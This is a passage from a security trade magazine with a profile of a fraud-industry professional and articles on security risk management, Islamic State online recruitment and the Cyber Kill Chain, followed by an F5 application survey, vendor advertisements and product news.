now, but it’s still an indication of the struggles we sometimes have in a male-dominated environment.” She never let these moments deter her from what she enjoyed and ultimately to an incredible career. Working with the best and brightest in their field has been very rewarding for her, saying it’s the people that make the job. “I love meeting new people, getting to know them, helping them with issues and becoming lifelong friends. People in this industry are very practical. They get the job done and I appreciate that. It’s also very close knit – the people I met in my first job are still in this industry.” This is one of the reasons why she says collaboration and relationships are so important. “Criminals collaborate; share what they are doing and what works on the dark web. They work together to conduct the crime, so we must do the same thing to combat it.” She also points out that she has two mentors that she uses as a sound board. “A mentor must have your best interests at heart. As a mentee, you must feel safe to share your heart and soul, tell them how you feel and ask for advice. If you can’t be yourself and are scared to ask questions because you’re afraid of being judged, I don’t think it’s the right fit.” “Both of my mentors have seen me at my worst, but they believe in me and guide me. They know my strengths and weaknesses, when to push me, which is important to me.” “It is so important to have a mentor that has your back,
but also knows when to push your boundaries. My mentors encourage me to do things that I would otherwise not do and it always turns out well and feels good afterwards.” But mentorship isn’t everything, and Michelle nominates two other key things in a company that help women climb the ranks: flexible and supportive working conditions and female role models. “Everyone needs someone to look up to, so if you can’t relate to someone in a leadership position it can be hard to encourage yourself and aspire to be one of them. Having a female role model also subconsciously affects others, as it influences their perception of women in power.” With hopes of being a mentor herself, Michelle definitely has a wealth of work and life experience to be a good role model for others and fuel the fire of change in the industry. A wife and mother, who wanted to be a clinical psychologist when she left school and ended up in IT without regret, offers the advice to women starting out to think about what you’re good at and reach out to people in the industry. “Join an association and decide where your strengths lie. If you love being surrounded by people then perhaps a front line fraud investigator may be a good option. If you’re inquisitive and like delving into data then perhaps Cyber Crime Analytics is right for you.” “Those who succeed in this industry are willing to take risks, give things a go and also know when to reach out and collaborate. Big networks rule.”
Chief IT Magazine | 31
Security and risk management the next evolution By Dr G Schneider CPP, FAIM, FIS (SA)
32 | Chief IT Magazine
n the ever evolving worlds of safety, security, health and emergency management (SSHE) the regulatory and best practice approaches continue to get more onerous and complex. The evolution of specialist areas within this spectrum has been inevitable. We have also seen a process whereby the areas of the SSHE spectrum, sometimes referred to as ‘Hard Risks’ (as opposed to soft risks such as currency risk) have become classed as grudge spend areas. This is especially true for the field of security risk management which historically has not had the driver of legislative consequence that the safety sector has had. As organisations or companies grow we have also seen the evolution of a diverse range of organic organisational and corporate structures. These structures have become so diverse and range from no direct allocation of SSHE activities to mass duplication. There is the ongoing reality that no one model can be applied across different sized organisations that are in different sectors, operating in vastly differing risk environments. However, in many cases organisations are suffering from wastage due to duplication and inefficiency or intolerably high risk exposure due to lack of resource allocation to ‘hard risk’ management. In many cases organisations are exposed to both of these realities simultaneously, specifically if they have become silo’d based on size, specialisation, management control or geographic complexity. The evolution of organisational silo’ing whereby hard risk management activities are broken up into various categories as organisations have grown and expanded is now the common reality not the exception. Whilst in principle, silos for large organisations are a necessity, when it comes to managing hard risk the reality of issues such as duplication
I
of activities, denial of incidents and risk exposure, transfer of blame and lack of authority all become potential issues. These issues are highlighted in the various versions of Workplace Health and safety legislation which in most cases does not differentiate between the employees and subcontractors and places the responsibility at all levels of an organisation (low level worker right up senior executive). The need to move away from the decades old checklist type Hard Risk management approaches utilised by most organisations has reached epidemic proportions. The harsh consequences of security incidents resulting from crime, (internal and/or external), fraud and terrorism including death, business disruption, reputational damage, fines and jail time are ever-present realities for modern business. The ability to subrogate and de-risk via insurances is no longer as robust as it once was based on the evolution of non-payment clauses for regulatory non-compliance and other complexities. The ability to de-risk via subcontracting has now been legislatively closed off and it is now well established legal precedent that all parties (top to bottom) involved in the supply chain are responsible for the identification, mitigation and management of foreseeable risk in a reasonably practicable manner. The complex mapping, rating and referencing systems that proliferate through the hard risk management world have actually reached a point where they are now no longer practical tools for risk management but merely academic routine and/or just another additional non-profit, nonperformance enhancing function that organisations “Have To” do. In addition the neglect of hard risk education for most of today’s business leaders who are often the product
Cyber Security
of academic education which specialises in conventional modelling and has contributed to two of the biggest issues facing organisations from a hard risk perspective today, namely DENIAL and REACTIVE APPROACHES based on ignorance and negligence. It is human nature to avoid systems that either do not show a direct reward, have a consequence which is deemed harsh enough to force compliance or have an effective ‘policing system ’in place to ensure compliance. One only has to look at traffic and road safety and imagine the carnage that would ensue without a set of rules that had harsh enough consequences for non-compliance and no enforcement to apprehend offenders. At various levels I have seen this happening in 100s of organisations we have come across in the last 15 years of business. This is not a unique issue to first world or emerging markets but the focus of hard risk management based on reactivity, sentiment and anecdotal behaviour seems to be the driver. Limitations on the way we view risk continue to be a propagator for reactivity and denial. In many cases this stems from the following core problems: • Consistent viewing of hard risk management as a grudge spend area • Failure to apply proactive budgets based on a dynamic risk based approach • Lack of understanding of actual vs perceived risk from a hard risk perspective • Inefficient use of internal resources • Inefficient use of external expertise • Lack of understanding of internal limitations • Lack of alignment of hard risk management understanding at senior executive as well as lower levels (middle management mayhem) These issues are further complicated by two realities: • The human factor • The use of technology (in terms of limitations or over reliance) While there is no doubt that we have come a long way in improving technology and people management systems we are missing some fundamental principles in the way we make things happen. Unfortunately, I have seen this over and over again where senior executive teams believe an issue has been resolved by creating and attempting to enforce a policy which has no real chance of being embraced at ground level and thus often becoming a purely academic exercise in futility. In fact the organisation may actually make themselves more vulnerable by having a policy but not adhering to it. A side effect of policy setting without effective implementation and take up, results in the executive believing that hard risks are under control, middle managers being frustrated that there are insufficient resources to implement and lower level never even being made aware of issues and or solutions. This reality is not new ground and many executives and managers live with this ongoing problem. So what can be done about these issues – here is a brief list of actions and concepts which could each be an article in their own rights: • Educate at all levels – understanding hard risk management in context at all levels of an organisation is critical as a starting point. One of the simplest ways
‘It is human nature to avoid systems that either do not show a direct reward, have a consequence which is deemed harsh enough to force compliance or have an effective ‘policing system ’in place to ensure compliance.’ to do this is get everyone talking the same hard risk language and not get too caught up in silo or specific jargon • Assess and understand realties in a dynamic way – we tend to want to ignore bad news and as such it is often hidden from the people that need to know until a crisis occurs. Regular health checks using internal and external resources is critical for more robust discussion making • Leverage internal resources – often there is internal expertise and knowledge that is not tapped as a result of corporate segregation and legacy, the creation of internal ‘kingdoms’ and the biggest problem – lack of internal cross silo forums and structures to leverage capabilities and sharing. This often comes down to HR based limitations tied back to KPI’s which sometimes create performance measurements that is silo specific and ignores the core objectives of the organisations on a macro level • Leverage external resources – it is important to know when external help is required and how it should be utilised. Not only are external assessments considered to be more impartial but they bring fresh eyes to issues that may have been taken for granted as being ‘just the way it is’. The challenge is to act once solutions are identified and not be demotivated by what may appear to be a mountain of issues with no clear start, end and implementation approach. • Invest in people – the biggest resource for mitigating risk is a ‘switched on’ staff and contractor base. We need to motivate people using both stick and carrot approaches in a balanced manner to gain their ‘buy-in ‘otherwise systems will fail and good intentioned solutions will not go anywhere. • Incorporate technology – it is important to find the balance between human trust and having sufficient checks and balances. We can’t forget that the battle ground of the future is in cyber space and organisations face ongoing vulnerability in managing the ‘hard risk’ realities of data and IP protection along with the physical safety and well-being of their staff. In summary, the core ingredients to implement a better security risk management approach stem from striving to eliminate denial via education and ongoing assessment and implementing a proactive approach which requires more than just paperwork and lip service. In essence the driver should be a move to change, improve and sustain an enhanced level of security and safety culture by aligning hard risk management to culture and core organisational objectives it is truly possible to turn risk to opportunity.
Chief IT Magazine | 33
Cyber Security Counter-terrorism Feature
Strategies used by Islamic State to recruit on social media The second part of this article looks at the risks posed by the strategies used by IS outlined in the previous article. Strategies on dealing with the issue are also discussed.
T by Robyn Torok Security Research Institute, Edith Cowan University, Perth, Australia
34 | Chief IT Magazine
his article (Part 2) is a continuation from Part 1 which looked at strategies used by Islamic State (IS). Part 1 explored a number of Neuro Linguistic Programming (NLP) Strategies used by IS in order to recruit individuals. These strategies included future pacing, anchoring and association/disassociation. This article will focus on the risk posed by these strategies as well as how they can be addressed. As clearly stated in the previous article, NLP strategies are not brainwashing strategies, they aim to persuade and direct an individual. NLP strategies are most effective when an individual is willing to undergo change and hence subject themselves to these techniques. In the case of IS recruiters, they are continually searching for individuals which they can influence. While individuals are often unaware of the NLP techniques being used, if they show a propensity toward the ideologies or discourses of IS then the probability of influence and subsequent recruitment increases. Any person in marketing knows that it is ultimately
a numbers game. Consider if IS target one thousand individuals and they are only successful in 0.2% of cases (just a small fraction of 1%) then two new recruits have joined Islamic State. While this figure is purely hypothetical it is aimed at demonstrating that even the most limited level of success poses a risk. As far as targeting a large number of individuals, this is not difficult for IS given their large online presence as well as their large number of sympathisers. Furthermore, the risk posed by recruitment is two fold and includes both travelling overseas to join IS as well as domestic acts of lone wolf terrorism. The more important question is what can be done about tackling this issue. Firstly, there is a need to better understand the discourses and recruitment process of groups like Islamic State. Not all individuals are equally at risk, those disengaged from society and disaffected are at a higher risk. This goes well beyond disaffected muslims to include anti government supporters, hackers, those attracted to violence, individuals who feel betrayed and isolated and so
Counter-terrorism Feature
‘...there is a need to better understand the discourses and recruitment process of groups like Islamic State. Not all individuals are equally at risk, those disengaged from society and disaffected are at a higher risk. This goes well beyond disaffected muslims to include anti government supporters, hackers, those attracted to violence, individuals who feel betrayed and isolated and so on.’ on. These types of groups need to be also monitored on social media especially for the presence of recruiters. Secondly, there is a need to challenge these discourses and techniques with counter discourses. Any measures used by the government in dealing with this issue will be turned into propaganda, especially highlighting the grievances of Muslims. Such propaganda can in many cases be preempted and addressed. The only issue with this approach is that many times individuals are well isolated from such counter discourses unless they can be identified and targeted early. Once individuals show adequate affiliation, they tend to be redirected to specific pages or sites to better engage and more importantly isolate individuals with the necessary discourses of jihad and martyrdom. Thirdly, there is a need to deal with the broader issue of the success of the Islamic State. The development of an Islamic Caliphate under Sharia Law is the goal of Islamic extremism and such an ideal is seen as worth joining. Clearly, this complex geo-political situation must also be addressed which is beyond the scope of this article. Nonetheless, events on the ground are reflected on social media with virtually unlimited scope for the production of promotional video material for YouTube. Most importantly, based on the current situation, most political scholars agree that this is going to be a long term process and at this stage the risk posed by Islamic extremism will not subside in the foreseeable future. Fourthly, the work of the government in dealing with this issue must also be acknowledged. The tough line drawn sends a clear message that joining or supporting an organisation like Islamic State is not acceptable in Australian Society. Airport screening and cancelling passports, challenging the notion of citizenship and enabling new legislation all provide greater scope in tackling the issue. While it is acknowledged that these measures will not always serve as a deterrent given that many who travel over are prepared for martyrdom, it has significantly increased the chance of stopping those wanting to go over and also serves to prevent further radicalisation of others if these individuals try to return. The final point covers the broader issue of online radicalisation and extremism. While the number of Australians who have joined IS is alarming, what is more concerning is the significant number of online sympathisers of Islamic State. These are individuals who in most cases would not travel overseas or be a part of a terrorist plot themselves, yet they play an important role in online radicalisation and recruitment. Essentially, these individuals
provide the framework for an online institution in which radicalisation and recruitment take place. In addition, they create a sense of solidarity amongst IS supporters especially in relation to key events including both IS setbacks and victories in Iraq and Syria. More concerning is the fact that many of these are young people are still in the stages of identity formation. While intelligence agencies are working hard to monitor potential threats, the voluminous nature of online material on social media makes it extremely difficult to focus on everything but the most pressing threats. Consequently, it is important for all Australians to watch out for our young people especially those who have spend a great deal of time with them. Whether formal monitoring programs arise or not, there is a need for everyone to watch for signs of withdrawal, radicalisation, intolerance and intent. Most importantly, this is not limited to Muslim populations, it is an Australian issue where those from any background are potential recruits especially marginalised individuals. Hence a top down approach is also needed. Even highly educated professionals such as doctors and engineers are joining IS to help the State to function. The Muslim community are already playing a critical part in educating young people about the dangers of extremism with bottom up community approaches. What is challenging is that radicalised individuals tend to disengage from mainstream society and therefore early identification and intervention stemming from those who work closely with them is critical. In conclusion, the threat posed by IS appears to be a fairly long term threat and includes recruitment to travel overseas or to conduct lone wolf attacks. The Federal Government has already taken a number of very significant and effective measures aimed at preventing individuals from travelling overseas as well as increased monitoring and surveillance of potential threats. Better understanding of radicalisation processes and a broad approach to watching the risks posed to young Australians from all backgrounds is also needed for long term management of this issue.
Chief IT Magazine | 35
Cyber Security Counter-terrorism Feature
Anatomy of a cyber attack The Cyber Kill Chain is not a new concept but rethinking how we can use it for IT security may change your defence strategy.
by Adeline Teoh
36 | Chief IT Magazine
odus operandi or MO, is the Latin term used to describe a ‘method of operation’. It’s handy for police trying to catch a serial killer, looking at clues that establish a pattern of behaviour that will enable them to link the crime to the perpetrator. Knowing how the killer behaves helps investigators form an understanding of the event and may even help to prevent the next murder. It’s a similar story when IT security experts talk about the Cyber Kill Chain. If you have a military or defence background, you may already be familiar with the concept of a kill chain, which is the general structure of any attack: identify target, deploy operatives, decide on and order an attack, destroy the target. A Cyber Kill Chain, a term coined by Lockheed Martin in a 2010 paper, is the standard modus operandi of an IT attacker, the process by which most attacks are carried out, particularly in the extraction of valuable information. It consists of the following steps: 1. Reconnaissance: The attacker researches a target. This is often carried out without entering your IT system. 2. Weaponisation: The attacker works out what method to use that will likely result in establishing a
M
presence inside your system. This may include finding unpatched software that can be a back door into the system or selecting the best type of malware to use. 3. Delivery: The attacker gains entry into your IT system, usually through a malicious URL that may be in an email, app or file. 4. Exploitation: The attacker finds vulnerabilities in your system that will enable his/her malware to compromise the environment. 5. Installation: The attacker establishes malware inside your IT perimeter. 6. Command: The attacker gains control of the environment by creating a communications channel between your system and his/hers. 7. Action: The attacker achieves his/her objectives. Often this is exfiltration of data or system disruption. While it all sounds pretty menacing, the Cyber Kill Chain is as much an opportunity as it is a threat, says Craig Lawson, Research Director – Security & Privacy at Gartner. “It’s a way to describe the workflow of an adversary. The good thing is it hasn’t changed in 20 years,” he explains.
Cyber Security
The weakest link IT security has a role to play at every stage of the kill chain to weaken the links. •
Policy: Make reconnaissance harder by educating staff about not sharing sensitive information in public.
•
Patch hygiene: According to Verizon, 90% of attacks exploit a vulnerability for which a patch had been available for a year or more. Updating software in a timely manner makes it harder for the attacker to get in.
•
Detection: How do you define suspicious activity? Consider behavioural analytics, which will also catch internal threat actors. How do you know what parts of your system are compromised? Map suspicious activity to see if there’s a pattern.
•
Response: How will you quarantine a compromised part of your system? What’s your process for kicking out an adversary? “Work on your incident response plans,” says Lawson. “The best time to do that is before you have an incident.”
Rethinking IT defence
“When you think about how you want to build your security program, this helps us because it allows us to better align our defences to the way the adversaries are coming at us.” Recent research by Mandiant found that attackers spend an average of 205 days inside the perimeter of their victims’ systems before they are discovered. While this lengthy dwell time certainly looks bad for the IT security team, there is actually an up side, says Lawson. “The adversaries are maintaining a really long dwell time. They’re maintaining persistence on our network for 200-300 days before they get found. What’s the good outcome in that? The good outcome is they probably spent the first 30-60 days figuring out where all the data was before they started exfiltrating it. It’s actually in our favour because it means getting in and then sneaking the data out is actually a long process—we know it takes adversaries days and weeks to do that second part.” This is where organisations can use the Cyber Kill Chain to reconsider their IT defence strategy. If the cycle of exploitation – installation – command is inevitable, if IT security teams accept that they will always have machines compromised with malware, then their focus can shift to the really important work, which is actually preventing adversarial action.
From the start, countering cyber attacks has largely been about preventing threat actors from coming within the perimeter. It’s an electric fence approach that works until it doesn’t. All it takes is for someone within the organisation to open the door, or temporarily disable the electricity on the fence, to let a cyber attacker in. It also assumes that the threat is coming from the outside when it may well come from within. Lawson says instead of focusing our efforts on guarding our system from infiltration and defending against malware on our machines, we should really look at what it means for the bad guys to succeed. “One of the problems we have in IT security is that our definition of defeat is different to our adversary’s definition of victory. We often get bent out of shape if our web server is attacked with a single injection or a laptop gets malware on it but in reality, when you look at how the Cyber Kill Chain works, that’s kind of the start, nothing really bad has happened at that point,” he explains. “Most adversaries are really looking at exfiltrating data. We have this mindset of ‘we need to prevent everything bad from happening across all assets, at all times’, but that’s a flawed response. Winning in the 21st century to me is not about preventing every single attack, it’s about preventing exfiltration. It’s a different mindset in terms of where you spend your time and money.” ‘Cyber Kill Chain’ is a registered trade mark of Lockheed Martin; Gartner uses the term ‘Cyber Attack Chain’ in its formal whitepapers, however its analysts use Cyber Kill Chain as a generic term to describe any IT attack chain.
Chief IT Magazine | 37
STATE OF APPLICATION DELIVERY IN APAC 2015 Applications have changed our world, and they continue to change business and business strategy. Companies in every industry rely on applications to drive customer engagement, employee productivity and revenue. However, what is less widely studied is the huge range of “app services” that improve APPS’ performance and reliability, as well as enhance security. To understand more about the applications that organisations rely on, F5 surveyed 3,266 IT decision makers across Asia about their current and planned use of application services.
Number of applications currently deployed in the company
1 - 200
201 - 500
45%
17%
501 - 1,000
1,001-3,000
11%
6%
Key Findings Apps are growing in popularity
Organisations are managing enormous numbers of apps already, and they’re critical to the modern fabric of business
The flexibility of cloud is irresistible
Apps are being moved into the cloud as organisations embrace the “cloud first” philosophy
I don’t know /other
Over 3,001
8%
13%
What portion of your apps could you shut down and only a handful of end users would notice? None
33% All
App security is now the no. 1 priority
With so much riding on apps, keeping them secure is now the top priority for businesses in Asia
13% I don’t know
41%
But progress is slow and challenges exist
From performance issues to reticence to deploy SSL, the path is anything but smooth
Other
13%
Apps are growing in popularity…and this will not stop anytime soon Applications have changed our world, and are changing the way business is conducted. Almost half (45%) of organisations now deploy 1-200 applications, while almost a fifth (17%) said they deploy 201-500. Applications have become an integral part of business life, with a third of respondents stating they were unable to shut down a single app without someone noticing!
To ensure a flawless service between applications and end users, a great array of application services are being deployed. Surprisingly, in APAC performance plays second fiddle to identity/access, while security is on everyone’s agenda. The majority of organisations have already deployed SSL VPN, while identity federation, application access control, and single sign-on are all earmarked for deployment over the coming year by around a quarter of respondents.
The flexibility of cloud is irresistible
Expected business applications moved to the cloud by 2016
APAC currently lags behind the rest of the world somewhat in terms of cloud adoption in application services. Just 11% of security application services on average are deployed in the cloud, with the vast majority of organisations preferring to keep it on premise. But this is changing as organisations find the lure of cloud irresistible. 41% of respondents said 0-24% of applications could be moved to the cloud by 2016, while almost a quarter estimate it to be 25-50%. A small percentage of respondents (5%) even predicted that up to their entire application portfolio could soon be cloud based.
I don’t know /other
0% - 24%
18%
41% 51% -75%
12%
25% - 50%
24%
76% - 100%
5%
What are the emerging trends with strategic importance for your organisations in the next two to five years? Public cloud services (laaS)
Private cloud
35%
43%
Software as a Service (SaaS)
37%
DevOps
13%
Software Defined Networks (SDN) 35% Physical data centre consolidation
Mobile applications
38%
Virtual desktop
33%
WAN optimisation
22%
IPv6 migration
having “strategic importance” to their organisation over the next two to five years, with 37% choosing SaaS and 35% also opting for public cloud services (laaS). This could be driven in part by the rise in “cloud first” strategies across APAC, currently employed by 46% of respondents.
44%
Internet of Things
Big data analytics
A large propotion (43%) of respondents saw private cloud as
27%
43% 21%
Interestingly, the research also revealed that respondents saw mobile applications and big data analytics as more important trends than the Internet of Things. These findings suggest a growing Hybrid Environment across the region, with a mix of off and online solutions increasingly being adopted by enterprises.
App security is now the no. 1 priority Organisations that plan to deploy or implement security application services within the next 12 months
80
%
70 60 50
Deployed today
40 Will deploy in 12 months
30 20 10
No plans to deploy DDoS Web protection/ application mitigation firewall
IPS/IDS
Anti-virus Anti-fraud
With so much momentum behind cloud, security is now inevitably becoming a top priority. Of all the application services, security was by far the most popular in our survey, outranking even availability. Anti-virus and network firewall (72%) led the deployments, with around a quarter of organisations planning to deploy DDoS protection and anti-fraud services in the next 12 months. A further quarter
SPAM mitigation
DNSSEC
Network firewall
had no plans to deploy DDOS protection at all, suggesting that Asian organisations still do not view this as a significant threat to their business. In fact, 42% of respondents said that the worst thing you could deploy application services without was security. Only 13% chose identity/access services, while a mere 6% saw mobile as a crucial decision.
Top concerns for organisations when deploying applications without...
Identity/Access 13%
Availability 30%
Security 42% We also asked our respondents “Which of the following attack surfaces is your organisation protecting: the client, inbound requests, outbound traffic?” Around a quarter of respondents said they protect all three attack surfaces only “sometimes”, an identical finding to organisations in North 40 | Chief IT Magazine
Mobility 6%
Performance 10%
America when they were asked the same question. Despite more than half claiming to always protect both the client and inbound requests, a staggering 12% of APAC organisations never protect outbound traffic.
But progress is slow and challenges exist 17%
29%
We don’t have any challenges at this time
We haven’t identified a comprehensive identity and access management policy
14%
I don’t know
35% We don’t have the analytics to understand when it is best to deploy applications in cloud data centres and when it is most cost effective to deploy in our own data centres
Challenges organisations face when adopting Hybrid Cloud
19%
We are not adopting a Hybrid Cloud environment
23%
We are unable to have consistent application performance across Hybrid Cloud deployments
21%
We are unable to find a cloud provider that meets our data security requirements But despite this rush to the cloud, the road is not entirely smooth, and challenges do exist. Only 22% of respondents had fully deployed SSL, for example, with a quarter of organisations admitting to having no idea when they would. While Hybrid Clouds are growing in popularity, a third (29%) of organisations admit that their slow adoption was down to their failure to identify a comprehensive identity and access management policy. Even more (35%) admitted that they lacked the internal knowledge to know when best to deploy in publicly or privately.
Just 11% of respondents were very confident that their organisation could withstand an application level security threat. When asked what they would give up to make their network more secure, 25% said network appliance device consolidation and a similar number said network programmability options, while just 6% said availability, suggesting that meeting customer expectations is a big priority.
Conclusion The evidence of this survey indicates that organisations in APAC are aware of the importance of application services and rely heavily on them to maintain service quality levels. As application deployments expand beyond the data centre to include public, private and hybrid cloud models,
complexity and diversity of application services will evolve fast. But the success of this strategy – which seems to be gathering pace over the next 12-24 months – relies heavily on the effectiveness of the security infrastructure that is deployed concurrently.
Solutions for an application world.
@F5NetworksAPJ
F5NetworksAP
F5-Networks
©2015 F5 Networks, Inc. All rights reserved. F5, F5 Networks, and the F5 logo are trademarks of F5 Networks, Inc. in the US and in certain other countries. Other F5 trademarks are identified at f5.com. Chief IT0113. Magazine | 41 Any other products, services, or company names referenced herein may be trademarks of their respective ownerswith no endorsement or affiliation, express or implied, claimed by F5. CS01-2029
Video: See Siveillance Vantage in action
www.siemens.com.au/bt-security
Siveillance™ Vantage secures your critical infrastructure Siveillance™ Vantage is a command and control workflow engine, specifically designed to support security management for critical infrastructure. Using innovative software, Siveillance Vantage not only ties together all the sub-systems currently used to protect and manage your site, but it also allows you to customise and integrate security policies and procedures using workflows and automated actions.
Siveillance Vantage offers the desired level of security and provides peace of mind at any time for: § § § § §
Airports and ports Correctional facilities Government assets Campuses Energy infrastructure assets
For more information, contact us on 13 72 22 or visit our website www.siemens.com.au/bt-security
www.siemens.com.au 42 | Chief IT Magazine
Within TechTime you will find the very latest information, news and products from a wide variety of security industries, ranging from cameras, computers, software and hardware.
To have your company news or latest products featured in our TechTime section, please email promoteme@australiansecuritymagazine.com.au
Latest News and Products Chief IT Magazine | 43
TechTime - latest news and products
Honeywell digital video manager helps improve operator efficiency and mitigate business risk The Latest release of smart surveillance software helps boost reliability and enhance operator efficiency with mobile and voice control. Honeywell has announced enhancements to Honeywell Digital Video Manager (DVM). The latest release, DVM R600, will enable organisations to more efficiently manage their security system with enhanced mobile capabilities and voice command, and mitigate business risk via support for current IT platforms. Major updates to DVM include enhanced system access and usability, which are designed to improve operator efficiency and reaction time. Security personnel now can access high-definition, full-frame-rate video on a mobile device, for example, enabling continuous monitoring from almost any location. Operators can also control DVM using voice commands to more easily manage multiple video feeds and request near-real-time system updates. “Every second is important to an organisation when an incident occurs and security staff must take immediate action if there is a threat,” said John Rajchert, president of Honeywell Building Solutions. “The latest update to DVM helps operators quickly identify and react to an issue to help mitigate the impact to safety and business continuity — no matter if they are in front of a central workstation or on the opposite side of a campus, connected with a smartphone.” Along with an improved user experience, DVM R600 promotes IT integration and compliance with support for current Microsoft operating systems and databases, including Windows Server 2012, Windows 8.1, Internet Explorer 11 and SQL Server 2014. (Windows Server 2003 is not recommended because security systems running on the platform could be vulnerable to breaches since it’s no longer supported by Microsoft, as reported, and will not receive further updates.) In addition, DVM R600 allows customers to deploy and intelligently group multiple back-up servers to boost system robustness, which helps protect surveillance systems from failures. Other DVM upgrades focus on: Speeding data collection — Security operators can export footage from multiple camera feeds in unison to streamline incident response and workflow, and quickly collect and archive forensic data in the event of an incident. Reducing storage requirements — Dynamic
44 | Chief IT Magazine
recording enables the system to capture critical video under higher frame rates, while collecting less important footage at lower frame rates, trimming storage requirements and costs up to 40 percent. “Our surveillance system has always been robust, utilising hundreds of cameras throughout both our facilities to promote visitor safety and security,” said Tom Owen, operations manager for Brookfield Global Integrated Solutions, which manages the Melbourne Convention and Exhibition Centre in Australia. “However, the IT infrastructure required large storage capacity and as many as 15 standalone PC servers. We have cut our costs significantly with DVM R600 by using the system’s singleserver virtual machine environment, and intelligent redundancy of storage, processing and memory. The new architecture has also helped lower life-cycle and maintenance costs.” DVM is a component of Honeywell Enterprise Buildings Integrator (EBI), an awardwinning building management system that ties all aspects of a security solution together,
including video surveillance, access control and intrusion detection. EBI also integrates comfort, life safety, energy and other core facility controls providing users a single point of access to the essential information and resources needed to monitor, manage and protect a facility, campus or multi-site operation. As a result, security operators have optimised visibility and intelligence, and the ability to deploy their staff and resources more efficiently and effectively. For more information, visit buildingsolutions. honeywell.com, follow HoneywellBuild on Twitter and join the Honeywell Connected Buildings group on LinkedIn. Honeywell (www.honeywell.com) is a Fortune 100 diversified technology and manufacturing leader, serving customers worldwide with aerospace products and services; control technologies for buildings, homes and industry; turbochargers; and performance materials. For more news and information on Honeywell, please visit www.honeywellnow.com
Information presented in TechTime is provided by the relevant advertiser and are not necessarily the views of My Security Media
TechTime - latest news and products
Zaplox mobile key services integrated with SALTO hospitality access control solution Global provider of advanced access control systems integrated to Zaplox’ streamlined cloud-based Mobile Key Services Zaplox has integrated its solution with SALTO Systems, providing hotels and their guests with unmatched convenience and superior satisfaction. As a result, Zaplox will be the first Mobile Key Services company to announce its integration with SALTO Systems. This strategic global partnership allows any property with SALTO BLE (Bluetooth Low Energy) enabled locks installed to easily implement mobile access functionality for their guests, while experiencing the unique operational benefits that Zaplox Mobile Key Services provide. Through the new technology integration with Zaplox, guests of properties with SALTO access control systems will now be able to use their smartphones for guestroom access, while allowing hoteliers to offer and promote revenue creating smart services with full customization and hotel branding on the Zaplox Mobile Key Services app platform. This wide range of ancillary services, which can be made available in the app, includes mobile check-in and checkout, room upgrades, restaurant bookings, room service, special offers and more. The user-friendly Zaplox Mobile Key Services app is easily downloaded and available for all major smartphone platforms. With recent industry research indicating that more than 70 percent of travelers would opt to use their smartphones as a check-in alternative, Zaplox Mobile Key Services allow guests to bypass the front desk altogether, saving them valuable time. Additionally mobile keys are highly secure, since a guest’s smartphone is less likely to be misplaced than a plastic keycard and typically is password protected. Should a guest lose their phone, mobile keys can easily be revoked and reassigned in real time by hotel staff. In less than 10 years, SALTO has become one of the world’s top five manufacturers of electronic access control systems. SALTO has a strong tradition of delivering the latest in guestroom access technology and has launched a series of innovations since it’s founding, raising the bar of guestroom security to new heights. By combining SALTO smart locks with Zaplox Mobile Key Services, hotels benefit from enhanced cost efficiencies through streamlined operations and revenue opportunities, allowing front desk staff to focus on other aspects of guest service and communication.
Information presented in TechTime is provided by the relevant advertiser and are not necessarily the views of My Security Media
“We are thrilled to serve as the first mobile key app provider for SALTO Systems, as a result providing the company and its clients with an integration ready solution that is instantly available for commercialization around the globe,” says Magnus Friberg, CEO at Zaplox, “This is a very important collaboration for Zaplox, since it opens up new market possibilities together with an industry-renowned partner. We strongly believe that mobile keys and the additional services included will improve both guest loyalty and enhance the guest experience by making it smooth and comfortable.” “Research shows guest demand for the use of smartphones and apps as part of their hotel experience is increasing” says Jennifer Stack, Vice President Marketing SALTO Systems, “So this integration with Zaplox is perfectly placed to deliver an exciting range of benefits enabling them to enjoy all the advantages provided by integrated smart technology to maximize the flexibility and enjoyment of their hotel stay.” For more information on how Zaplox and SALTO Systems are revolutionizing mobile key services for hotels, please visit www.zaplox.com or www.saltosystems.com About SALTO Systems We’re driven by innovation. Guided by our insights into customer needs, we deliver industry-leading, next-generation electronic locking solutions without wires and without mechanical keys. Since 2001, SALTO has been redefining the access control world by continually being first to anticipate market needs in a rapidly
evolving marketplace. We set new standards in security, manageability and scalability. SALTO’s pioneering SVN platform provides stand-alone networked locking solutions. With its online and real-time technology, our marketleading XS4 platform enhances the usability of every building environment by securing virtually every door and enabling the monitoring and control of every user. Salto hardware and software can be networked without wires to provide real-time intelligence and instant control, whilst enabling integration with existing systems to improve manageability and enhance end-user experience. Having revolutionized access control around the world in sectors where security is critical – from airports and healthcare to government education and hotels – we continue to deliver the most advanced and flexible electronic locking solutions in the market. About Zaplox Zaplox operates globally, offering hotels and other commercial facilities efficient and secure mobile key services for opening doors with smartphones, in combination with revenue making services, all in one app and service platform. It is easy to use and works on all major smartphones, in both Apple and Android platforms. The Zaplox solution can support major locks, hotel systems and access systems, and can replace or coexist with key cards, code locks and physical keys. Zaplox was founded in 2010 in Ideon Science Park, Lund, Sweden, and is established in Europe and North America. For more information, please visit www.zaplox.com
Chief IT Magazine | 45
Cyber TechTime - latest news and products
Akamai Q2 2015 state of the internet – security report The Number of DDoS attacks has more than doubled compared to Q2 2014 and are megaattacks on the rise. An aggressive, multi-week Shellshock application attack, targeting a single customer, was responsible for 49% of web application attack alerts in Q2 2015. Akamai researchers uncover 49 new WordPress plug-in and theme vulnerabilities Akamai Technologies, Inc., has announced the availability of the Q2 2015 State of the Internet – Security Report. This quarter’s report, which provides analysis and insight into the global cloud security threat landscape, can be downloaded at www.stateoftheinternet.com/ security-report. “The threat posed by distributed denial of service (DDoS) and web application attacks continues to grow each quarter,” said John Summers, vice president, Cloud Security Business Unit, Akamai. “Malicious actors are continually changing the game by switching tactics, seeking out new vulnerabilities and even bringing back old techniques that were considered outdated. By analysing the attacks observed over our networks, we’re able to identify emerging threats and trends and provide the public with the information to harden their networks, websites and application and improve their cloud security profiles. “For example, for this report, we not only added two web application attack vectors to our analysis, we also examined the perceived threat posed by the onion router (Tor) traffic and even uncovered some new vulnerabilities in third-party WordPress plugins which are being published as CVEs,” he said. “The more you know about cyber security threats, the better you can defend your enterprise.” DDoS attack activity at a glance For the past three quarters, there has been a doubling in the number of DDoS attacks year over year. And while attackers favoured less powerful but longer duration attacks this quarter, the number of dangerous mega attacks continues to increase. In Q2 2015, there were 12 attacks peaking at more than 100 Gigabits per second (Gbps) and five attacks peaking at more than 50 Million packets per second (Mpps). Very few organisations have the capacity to withstand such attacks on their own. The largest DDoS attack of Q2 2015 measured more than 240 gigabits per second (Gbps) and persisted for more than 13 hours. Peak bandwidth is typically 